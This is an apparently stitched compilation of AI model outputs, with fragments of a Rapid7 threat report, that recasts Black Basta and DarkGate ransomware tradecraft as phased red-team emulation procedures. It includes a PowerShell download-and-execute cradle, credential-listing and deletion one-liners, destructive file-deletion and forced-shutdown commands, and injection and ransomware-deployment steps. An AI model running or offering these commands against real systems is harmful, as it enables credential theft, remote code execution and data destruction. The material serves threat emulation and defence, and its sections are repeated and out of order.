U_Binder U_BotUpdate U_Constantes U_FTPRecovery U_FileManager U_FileManagerMisc U_GetScreens U_HVNC U_HVNC_7 U_HWID U_InfoRecovery U_InjectOnFly U_Keylogger U_LNKStartup U_MemExecute U_MemExecuteMisc U_RemoteScreen U_SysApi U_SysNtReadWrite

Phase: Execution

• Technique: Remote Shell via PowerShell

• Command: powershell.exe -Command Start-Process PowerShell -ArgumentList 'iex (New-Object Net.WebClient).DownloadString(''[url]'')'

• Technique: Remote Shell via CMD

• Command: cmd.exe /c [shell commands]

Phase: Privilege Escalation

• Technique: Injecting Shellcode
• Command: Use ResumeThread or CreateRemoteThread to execute injected DarkGate shellcode in specified processes.

Phase: Defense Evasion

• Technique: Credential Removal

• Command: cmdkey /list | findstr /v "Web Credential Manager" | findstr /v "Ok" | findstr /v "Generic Credentials" | findstr /v "Vault" | findstr ":" | for /f "tokens=1,2 delims=:" %i in ('more') do cmdkey /del:%i

• Technique: File Deletion

• Command: cmd.exe /c del /q /s c:\ProgramData\hedfdfd\*
• Command: cmd.exe /c del /q /s c:\temp\*

Phase: Credential Access

• Technique: Harvesting Credentials from FileZilla
• Procedure: Steal sitemanager.xml and recentservers.xml from %APPDATA%\FileZilla\ if present.

Phase: Persistence

• Technique: System Re-infection
• Procedure: Reinfect the system with AU3 payloads if configured to do so.

Phase: Impact

• Technique: System Shutdown

• Command: shutdown /s /t 0

• Technique: System Restart

• Command: shutdown /r /t 0

• Technique: Ransomware Deployment

• Procedure: Create ransom.txt and decrypter.exe in c:\temp, terminate any existing decrypter.exe process, and execute decrypter.exe using CreateProcessA.

DarkGate Remote Command Related Strings

U_miniclipboard u_AntiAntiStartup u_Antis u_AudioRecord u_CustomBase64 u_ExtraMisc u_HollowInstall u_InjectEP u_InvokeBSOD u_RDPRecovery u_Ransomware u_ReadCookies u_ReverseShell u_RootkitMutex u_Settings u_SettingsPad u_ShellcodeEP u_UnlockCookies u_loadpe hxxps:// ipinfo[.]io/ip Mitigation Guidance Rapid7 recommends taking the following precautions to limit exposure to these types of attacks: Restrict the ability for external users to contact users via Microsoft Teams to the greatest extent possible. This can be done for example by blocking all external domains or creating a white/ black list. Microsoft Teams will allow all external requests by default. For more information, see this reference. Standardize remote management tools within the environment. For unapproved tools, block known hashes and domains to prevent usage. Hash blocking can be done, for example, via Windows AppLocker or an endpoint protection solution. Provide user awareness training regarding the social engineering campaign. Familiarize users with official help desk and support procedures to enable them to spot and report suspicious requests. Standardize VPN access. Traffic from known low cost VPN solutions should be blocked at a firewall level if there is no business use case. Rapid7 Customers InsightIDR, Managed Detection and Response, and Managed Threat Complete customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to this activity: Detections Suspicious Chat Request - Potential Social Engineering Attempt Initial Access - Potential Social Engineering Session Initiated Following Chat Request Suspicious Conversation - Potential Social Engineering Message Interaction Attacker Technique - Process Executed Using Nt Object Path Suspicious Process - Enumeration Burst via ShellExecute Attacker Technique - Renamed Kaspersky Dump Writer

Phase: Execution

• Technique: Shellcode Execution
• Related Strings and Mechanisms:
• u_ShellcodeEP

Phase: Persistence

• Technique: Process Injection with Installer
• Related Strings and Mechanisms:
• u_HollowInstall

Phase: Credential Access

• Technique: Read Cookies
• Related Strings and Mechanisms:
• u_ReadCookies

Phase: Lateral Movement

• Technique: Reverse Shell
• Related Strings and Mechanisms:
• u_ReverseShell

Phase: Impact

• Technique: Invoke BSOD
• Related Strings and Mechanisms:
• u_InvokeBSOD

Additional Components

• Technique: Remote Desktop Protocol Recovery
• Related Strings and Mechanisms:

• u_RDPRecovery

• Technique: Anti-Analysis/Anti-Debugging

• Related Strings and Mechanisms:

• u_AntiAntiStartup, u_Antis

• Technique: Rootkit/Mutex

• Related Strings and Mechanisms:

• u_RootkitMutex

• Technique: Customized Encoding/Decoding

• Related Strings and Mechanisms:

• u_CustomBase64

• Technique: Audio Recording

• Related Strings and Mechanisms:
• u_AudioRecord

These structured techniques and related procedures provide a representation of the threat actor's tactics, enabling a red team to simulate the described attack scenario.

Detections Ransomware - Possible Black Basta Related Binary Execution Credential Access - Steal or Forge Kerberos tickets Suspicious Process - Diskshadow (Windows Server) Delete Shadow Copies Non-Approved Application - Remote Management and Monitoring (RMM) Tools MITRE ATT&CK Techniques Tactic Technique Procedure Resource Development T1587.001: Develop Capabilities: Malware The threat actor is actively developing new malware to distribute. Impact T1498: Network Denial of Service The threat actor overwhelms email protection solutions with spam. Initial Access T1566.004: Phishing: Spearphishing Voice The threat actor calls impacted users and pretends to be a member of their organization’s IT team to gain remote access. Defense Evasion T1140: Deobfuscate/Decode Files or Information The threat actor encrypts some zip archive payloads with a password. Defense Evasion T1055.002: Process Injection: Portable Executable Injection Multiple payloads executed by the threat actor utilize local PE injection. Defense Evasion T1620: Reflective Code Loading Multiple payloads executed by the threat actor load and execute shellcode. Credential Access T1649: Steal or Forge Authentication Certificates The threat actor has distributed numerous signed malware payloads. Credential Access T1056.001: Input Capture: Keylogging The threat actor runs an executable that harvests the user’s credentials. Credential Access T1558.003: Steal or Forge Kerberos Tickets: Kerberoasting The threat actor has performed Kerberoasting after gaining initial access. Discovery T1033: System Owner/User Discovery The threat actor enumerates asset and user information within the environment after gaining access. Command and Control T1572: Protocol Tunneling The threat actor has attempted to use SSH reverse tunnels. Command and Control T1219: Remote Access Software The threat actor has used QuickAssist, AnyDesk, ScreenConnect, TeamViewer, Level, and more, to facilitate remote access. Indicators of Compromise Indicators of compromise are available here. NEVER MISS AN EMERGING THREAT Be the first to learn about the latest vulnerabilities and cybersecurity news.

Phase: Resource Development

• Technique: Develop Capabilities: Malware
• Procedure: The threat actor actively develops new malware for distribution.

Phase: Initial Access

• Technique: Phishing: Spearphishing Voice
• Procedure: The threat actor calls impacted users, impersonating IT personnel to gain remote access.

Phase: Execution

• Technique: Portable Executable Injection
• Procedure: Multiple payloads executed via local PE injection.

Phase: Defense Evasion

• Technique: Deobfuscate/Decode Files or Information

• Procedure: Encrypt zip archive payloads with a password.

• Technique: Reflective Code Loading

• Procedure: Load and execute shellcode using reflective code loading.

Phase: Credential Access

• Technique: Steal or Forge Kerberos Tickets: Kerberoasting

• Procedure: Perform Kerberoasting after gaining initial access.

• Technique: Steal or Forge Authentication Certificates

• Procedure: Distribute signed malware payloads.

• Technique: Input Capture: Keylogging

• Procedure: Execute programs for keylogging to capture user credentials.

Phase: Discovery

• Technique: System Owner/User Discovery
• Procedure: Enumerate asset and user information post-access.

Phase: Impact

• Technique: Network Denial of Service
• Procedure: Overwhelm email protection solutions with spam.

Phase: Command and Control

• Technique: Protocol Tunneling

• Procedure: Use SSH reverse tunnels for communication.

• Technique: Remote Access Software

• Procedure: Utilize QuickAssist, AnyDesk, ScreenConnect, TeamViewer, Level for remote access.

Additional Techniques

• Technique: Diskshadow for Shadow Copies Deletion

• Command: Likely involves using Diskshadow commands to delete shadow copies.

• Technique: Non-Approved RMM Tools

• Procedure: Use Remote Management and Monitoring tools for persistence and control.

Model: gemini-2.0-flash

Okay, here's the breakdown of the procedures used by the Black Basta ransomware operators, formatted for red team emulation, based on the provided CTI report:

Phase: Initial Access

• Technique: Social Engineering via Microsoft Teams/Email Bombing
• Procedure:
  1. Email bomb the target user, signing them up to numerous mailing lists simultaneously.
  2. Contact the user via Microsoft Teams pretending to be IT support offering assistance. Impersonate IT staff.

Phase: Execution

• Technique: Remote Management Tool Installation

• Procedure: Trick the user into installing or executing a remote management tool such as:

  • QuickAssist
  • AnyDesk
  • TeamViewer
  • Level
  • ScreenConnect
  • Use OpenSSH client to establish a reverse shell

• Technique: QR Code Phishing

• Procedure: Send the user a QR code leading to an URL to bypass MFA.

Phase: Credential Harvesting

• Technique: Custom Credential Harvester Execution

• Procedure:

  1. Execute the custom credential harvesting DLL using rundll32.
  2. Example Command: rundll32.exe SafeStore.dll,epaas_request_clone
  3. The DLL will execute the following commands to gather system information:
     • systeminfo
     • route print
     • ipconfig /all
  4. The DLL will prompt the user to enter their password into a GUI.

• Technique: Java Credential Harvester Execution

• Procedure: Execute Java based credential harvester

Phase: Payload Delivery and Execution

• Technique: Loader Execution (Zbot/DarkGate)
• Procedure: Following credential harvesting, execute Zbot (Zloader) or DarkGate.
• Technique: Command Execution via Teams
  • Procedure: Send a short command via Teams, that when executed, begins an infection chain.
• Technique: Payload delivery with custom packer
  • Procedure: Deliver obfuscated versions of Black Basta ransomware through a custom packer
• Technique: In-Memory Payload Execution
• Procedure: Subsequent payloads are executed in memory.

Phase: Persistence

• Technique: Scheduled Task Creation (Zbot)
  • Procedure: Create scheduled tasks named after the executable to execute the malware upon logon.

• Technique: Registry Run Key Creation (Zbot)

  • Procedure: Create a Run key to execute the malware upon logon.

• Technique: Run key with AU3 script

  • Procedure: Create a Run key pointing to Autoit3.exe and the compiled Autoit3 script

Phase: Defense Evasion

• Technique: Process Hollowing (Zbot)

  • Procedure: Inject Zbot into a suspended instance of msedge.exe, created using NtCreateUserProcess and executed via ResumeThread.

• Technique: Anti-Hooking (Zbot)

  • Procedure: Load a fresh copy of ntdll.dll to avoid hooking, which is then used to perform calls to NTAPI functions.

• Technique: Check for Security Products (DarkGate)

  • Procedure: Checks for running processes and installation directories associated with specific security products.

Phase: Credential Access

• Technique: Kerberoasting (DarkGate)
  • Procedure: Perform Kerberoasting after gaining initial access.
• Technique: Credentials Stored in Site Manager
  • Procedure: Steal saved credentials stored in Filezilla Site manager

Phase: Lateral Movement

• Technique: Remote Service Execution (DarkGate)
  • Procedure: Utilize Remote Service Execution
• Technique: SSH Reverse Tunnels (DarkGate)
  • Procedure: Attempt to use SSH reverse tunnels for lateral movement.

Phase: Discovery

• Technique: System and User Discovery (DarkGate)
  • Procedure: Enumerate asset and user information within the environment after gaining access.

Phase: Impact

• Technique: Remove Infection Files (DarkGate)

  • Procedure: Remove infection files by using cmd.exe to delete the staging directories

• Technique: System Shutdown (DarkGate)

  • Procedure: Use the shutdown command to turn the system off

• Technique: System Restart (DarkGate)

  • Procedure: Use the shutdown command to restart the system

• Technique: Stealing Stored Browser Credentials (DarkGate)

  • Procedure: Attempt to steal Opera cookies if present, after terminating the process.

• Technique: Code Injection (DarkGate)

  • Procedure: Unconditionally log keystrokes and clipboard data to a log file in an encrypted fashion

DarkGate Hard-coded Commands (Examples)

/c cd /d "C:\Users\User\AppData\Roaming\<browser_dir>" && move <browser_name> <browser_name><random_alphabet_string> /c cmdkey /delete: /c cmdkey/list > c:\temp\cred.txt /c del /q /f /s C:\Users\User\AppData\Roaming\Mozilla\firefox* /c ping 127.0.0.1 & del /q /f /s c:\temp & del /q /f /s C:\ProgramData\hedfdfd\ & rmdir /s /q C:\ProgramData\hedfdfd\ /c shutdown -f -r -t o /c shutdown -f -s -t o /c wmic ComputerSystem get domain > C:\ProgramData\hedfdfd\fcadaab

This structured output should provide a solid foundation for a red team to emulate the Black Basta ransomware operator's tactics and techniques. Remember to adapt and modify these procedures based on your specific testing environment.

Model: gemini-2.5-flash-preview-05-20

Here's a structured extraction of the threat actor's procedures for red team emulation, focusing on commands, tools, and techniques, while excluding specific IOCs.

Phase: Initial Access

• Technique: Phishing: Spearphishing Voice (T1566.004)
  • Procedure: The threat actor initiates a social engineering campaign by email-bombing target users, often by signing them up to numerous mailing lists simultaneously.
  • Procedure: The threat actor contacts impacted users via Microsoft Teams as an external user, attempting to call or message them to offer assistance.
  • Procedure: The threat actor impersonates IT staff, using display names such as "Help Desk", "Technical Support", or "Administracion".

Phase: Execution

• Technique: Remote Access Software (T1219)
  • Procedure: If the user interacts, the threat actor attempts to persuade them to install or execute remote management (RMM) tools, including QuickAssist, AnyDesk, TeamViewer, Level, or ScreenConnect.
• Technique: Protocol Tunneling (T1572) / Command and Scripting Interpreter: PowerShell (T1059.001)
  • Procedure: The threat actor attempts to leverage the native Windows OpenSSH client to establish a reverse shell.
• Technique: Signed Binary Proxy Execution: Rundll32 (T1218.011)
  • Command: rundll32.exe <MalwareDLL.dll>,epaas_request_clone (Executes the DLL variant of the credential harvester.)
• Technique: Command and Scripting Interpreter: Windows Command Shell (T1059.003)
  • Procedure: The threat actor sends short commands via Microsoft Teams that, when executed by the user, initiate an infection chain.
• Technique: Process Injection (T1055) / Process Hollowing (T1055.012)
  • Procedure: Zbot malware (e.g., SyncSuite.exe) loads a fresh copy of ntdll.dll to avoid hooking.
  • Procedure: Zbot malware injects itself into a suspended instance of msedge.exe (created using NtCreateUserProcess and executed via ResumeThread).
  • Procedure: DarkGate malware injects shellcode into a specified process (e.g., Edge/Chrome processes or cmd.exe) via ResumeThread or CreateRemoteThread.
  • Procedure: DarkGate selects injection targets by searching for updatecore.exe within hardcoded directories like C:\Program Files (x86)\Microsoft\EdgeUpdate\ or C:\Program Files (x86)\Google\Update\. If not found, it defaults to C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe.
• Technique: Command and Scripting Interpreter: AutoIt (T1059.004)
  • Procedure: DarkGate delivers an AU3 variant, which creates script.a3x and Autoit3.exe in c:\temp and executes script.a3x via Autoit3.exe using CreateProcessA.
• Technique: Command and Scripting Interpreter: AutoHotkey (T1059.005)
  • Procedure: DarkGate delivers an AHK variant, which creates script.ahk, test.txt, and AutoHotkey.exe in c:\temp and executes script.ahk via AutoHotkey.exe using CreateProcessA.
• Technique: Custom Payload Execution
  • Procedure: DarkGate delivers a DLL variant, which creates libcurl.dll, test.txt, and GUP.exe in c:\temp and executes GUP.exe via CreateProcessA.

Phase: Persistence

• Technique: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001)
  • Procedure: Zbot malware copies itself to a random folder within the %APPDATA% directory and establishes persistence by creating a Run key (named after the executable) at HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
  • Procedure: DarkGate malware creates a Run key (e.g., named "daaadeh" or other custom string) at HKCU\Software\Microsoft\Windows\CurrentVersion\Run. This key points to copies of Autoit3.exe and a compiled AU3 script payload (e.g., dgfeabe.a3x) located in its main directory (C:\ProgramData\<random_hash_mainfolder_name>). Autoit3.exe then executes the AU3 script when the user logs on.
• Technique: Scheduled Task/Job (T1053.005)
  • Procedure: Zbot malware establishes persistence by creating a scheduled task (named after the executable) that executes the malware copy in %APPDATA% whenever the user logs on.

Phase: Defense Evasion

• Technique: Obfuscated Files or Information (T1027) / Deobfuscate/Decode Files or Information (T1140)
  • Procedure: The threat actor encrypts some zip archive payloads with a password.
  • Procedure: Credential harvester samples decrypt shellcode from embedded resources using an XOR key.
  • Procedure: Zbot malware stores strings and configuration encrypted within its .rdata section, decrypting them via XOR and RC4 operations.
  • Procedure: DarkGate malware decrypts its configuration using a customized XOR loop.
• Technique: Process Injection (T1055)
  • Procedure: Multiple payloads executed by the threat actor utilize local PE injection.
• Technique: Reflective Code Loading (T1620)
  • Procedure: Multiple payloads executed by the threat actor load and execute shellcode.
• Technique: Subvert Trust Controls: Code Signing (T1553.002)
  • Procedure: Malware payloads are signed with likely stolen code signing certificates.
• Technique: Parent PID Spoofing (T1055.004)
  • Procedure: DarkGate attempts to spoof the parent process ID (PPID) of its injection target by enumerating running processes for accessibility using OpenProcess and randomly selecting one to use with UpdateProcThreadAttribute prior to CreateProcessA.
• Technique: Virtualization/Sandbox Evasion (T1497)
  • Procedure: DarkGate checks for known virtual machine display strings using EnumDisplayDevicesa (though this was observed as disabled for one sample).
  • Procedure: DarkGate checks for specific registry keys, such as ProcessorNameString for "xeon".
  • Procedure: DarkGate attempts to bypass detected security products by initiating calls (e.g., rtladjustPrivilege, NtRaiseHardError) to crash the system if a specific file is not present and a Kaspersky product is detected.
• Technique: Process Discovery (T1057)
  • Procedure: DarkGate checks running processes using CreateToolhelp32Snapshot and related functions, comparing them against a hard-coded list of security products (e.g., Windows Defender, Sophos, Kaspersky, Avast, Bitdefender, etc.).
• Technique: Indicator Removal on Host: File Deletion (T1070.004)
  • Command: cmd.exe /c del /q /f /s C:\Users\User\AppData\Roaming\Mozilla\firefox* (Deletes Firefox browser data.)
  • Command: cmd.exe /c ping 127.0.0.1 & del /q /f /s C:\ProgramData\<random_hash_mainfolder_name>\ & rmdir /s /q C:\ProgramData\<random_hash_mainfolder_name>\ (Cleans up the malware's main directory.)
  • Command: cmd.exe /c del /q /f /s c:\temp (Deletes temporary files in c:\temp.)
  • Procedure: DarkGate deletes its persistence Run key if blacklisted analysis tools (e.g., Process Hacker, Process Monitor, Task Manager, Windows Registry Editor) are detected running in the active window.

Phase: Credential Access

• Technique: Input Capture: Keylogging (T1056.001)
  • Procedure: DarkGate unconditionally logs keystrokes from the infected system.
• Technique: Input Capture: Clipboard Data (T1056.004)
  • Procedure: DarkGate unconditionally logs clipboard data (under 1024 bytes).
• Technique: OS Credential Dumping (T1003)
  • Procedure: The threat actor executes a custom credential harvester (DLL or Java variant) that prompts the user for their password. This information is saved to a file (e.g., 123.txt in %TEMP% or a randomly named .txt file in the current working directory for the Java variant).
• Technique: Credentials from Password Stores: Browser (T1555.003)
  • Procedure: DarkGate renames browser directories (Firefox, Chrome, Brave) after terminating related browser executables.
  • Procedure: DarkGate attempts to steal Opera browser cookies after terminating the process.
• Technique: Credentials from Password Stores: Credential Manager (T1555.004)
  • Command: cmdkey /list > <path_to_output_file> (Lists stored credentials from Windows Credential Manager to a file.)
  • Command: cmdkey /delete:<target> (If running with administrative privileges, deletes stored credentials.)
• Technique: Steal Application Access Token (T1528) / Credentials from Password Stores: FileZilla (T1555.002)
  • Procedure: DarkGate steals sitemanager.xml and recentservers.xml from %APPDATA%\FileZilla\ if present.
• Technique: Steal or Forge Authentication Certificates (T1649)
  • Procedure: The threat actor attempts to steal available VPN configuration files.

Phase: Discovery

• Technique: System Information Discovery (T1082)
  • Command: cmd.exe /c systeminfo (Executed by the credential harvester.)
  • Command: cmd.exe /c ipconfig /all (Executed by the credential harvester.)
  • Command: cmd.exe /c route print (Executed by the credential harvester.)
  • Command: cmd.exe /c wmic ComputerSystem get domain > <path_to_output_file> (DarkGate collects domain information and saves it to a file.)
  • Procedure: The threat actor quickly enumerates the environment after gaining initial access.
• Technique: Account Discovery (T1087)
  • Procedure: Zbot malware collects the hostname, username, and installation date from the victim system's registry.

Phase: Command and Control

• Technique: Remote Access Software (T1219)
  • Procedure: The threat actor uses RMM tools (QuickAssist, AnyDesk, TeamViewer, Level, ScreenConnect) to facilitate remote control of the compromised asset.
• Technique: Command and Scripting Interpreter: PowerShell (T1059.001)
  • Procedure: DarkGate can create a remote shell via powershell.exe as a remote command (Command ID 1049).
• Technique: Command and Scripting Interpreter: Windows Command Shell (T1059.003)
  • Procedure: DarkGate can create a remote shell via cmd.exe as a remote command (Command ID 1093).
• Technique: Application Layer Protocol (T1071)
  • Procedure: DarkGate sends logged data (keystrokes, clipboard, active window text, user idle time, admin rights status) to command and control servers.

Phase: Impact

• Technique: Data Destruction (T1485) / Disk Wipe (T1490)
  • Procedure: DarkGate (Command ID 1111) creates ransom.txt and decrypter.exe in c:\temp, then terminates decrypter.exe if already running and executes it via CreateProcessA (likely for ransomware deployment).
• Technique: System Shutdown/Reboot (T1529)
  • Command: shutdown -f -s -t o (DarkGate remote command to forcefully shutdown the system, Command ID 1083).
  • Command: shutdown -f -r -t o (DarkGate remote command to forcefully restart the system, Command ID 1084).
• Technique: Service Stop (T1489) / Indirect Command Execution (T1564.004)
  • Procedure: DarkGate uses NTAPI calls RtlAdjustPrivilege and NtRaiseHardError to crash the system (Command ID 1081).